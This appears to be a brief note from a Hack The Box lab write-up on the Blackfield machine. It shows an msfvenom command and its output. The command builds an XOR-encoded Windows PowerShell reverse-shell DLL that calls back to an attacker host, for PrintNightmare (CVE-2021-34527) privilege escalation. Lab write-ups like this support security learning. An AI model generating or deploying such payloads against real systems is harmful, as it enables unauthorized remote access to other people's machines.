msfvenom
┌──(kali㉿kali)-[~/…/htb/labs/blackfield/printnightmare]
└─$ msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.11 LPORT=1234 -f dll -e x64/xor_dynamic -o printnightmare.dll
[-] no platform was selected, choosing msf::Module::Platform::Windows from the payload
[-] no arch selected, selecting arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor_dynamic
x64/xor_dynamic succeeded with size 1948 (iteration=0)
x64/xor_dynamic chosen with final size 1948
payload size: 1948 bytes
final size of dll file: 9216 bytes
saved as: printnightmare.dll
msfvenom generated a reverse shell DLL payload for [[Blackfield_Privilege_Escalation_4#[CVE-2021-34527](https //nvd.nist.gov/vuln/detail/CVE-2021-34527)|CVE-2021-34527]] the payload has been encoded with xor_dynamic